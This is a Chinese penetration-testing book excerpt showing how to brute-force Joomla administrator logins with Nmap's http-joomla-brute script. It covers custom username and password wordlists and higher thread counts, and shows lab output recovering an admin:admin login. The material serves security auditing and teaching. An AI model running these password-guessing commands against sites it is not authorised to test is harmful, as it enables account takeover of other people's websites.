《Nmap渗透测试指南》—第9章9.4节审计Joomla程序

本节书摘来自异步社区《Nmap渗透测试指南》一书中的第9章9.4节审计Joomla程序，作者 商广明,更多章节内容可以访问云栖社区“异步社区”公众号查看。

9.4　审计Joomla程序
表9.5所示为本章节所需Nmap命令表，表中加粗命令为本小节所需命令——审计Joomla程序。

操作步骤
使用命令“nmap -p80 --script http-joomla-brute 目标”即可对目标Joomla程序进行账号密码的暴力破解。

root@Wing:~# nmap -p80 --script http-joomla-brute 192.168.126.131

Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-13 12:53 CST
Nmap scan report for 192.168.126.131
Host is up (0.00036s latency).
PORT　 STATE SERVICE
80/tcp open　http
| http-joomla-brute:
|　 Accounts
|　　 admin:admin => Login correct
|　 Statistics
|_　　Perfomed 499 guesses in 301 seconds, average tps: 0
MAC Address: 00:0C:29:E0:2E:76 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 42.29 seconds
root@Wing:~#

分析
使用http-joomla-brute脚本可以有效地审计Joomla程序，作为网站站长或是网站管理员，使用该脚本是一个非常不错的自我审计的方法。同样地，我们也可以自定义账号密码字典，进行高效率的破解。

root@Wing:~# nmap -p80 --script http-joomla-brute　--script-args userdb=users.txt, passdb=passwds.txt 192.168.126.131

Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-13 12:56 CST
Nmap scan report for 192.168.126.131
Host is up (0.00036s latency).
PORT　 STATE SERVICE
80/tcp open　http
| http-joomla-brute:
|　 Accounts
|　　 admin:admin => Login correct
|　 Statistics
|_　　Perfomed 499 guesses in 301 seconds, average tps: 0
MAC Address: 00:0C:29:E0:2E:76 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 128.56 seconds
root@Wing:~# 
设置线程让破解更加高效。

root@Wing:~# nmap -p80 --script http-joomla-brute　--script-args userdb=users.txt, passdb=passwds.txt,http-joomla-brute.threads=5 192.168.126.131

Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-13 13:00 CST
Nmap scan report for 192.168.126.131
Host is up (0.00036s latency).
PORT　 STATE SERVICE
80/tcp open　http
| http-joomla-brute:
|　 Accounts
|　　 admin:admin => Login correct
|　 Statistics
|_　　Perfomed 499 guesses in 301 seconds, average tps: 0
MAC Address: 00:0C:29:E0:2E:76 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 31.10 seconds
root@Wing:~#

默认线程是3，我们将其设置为5。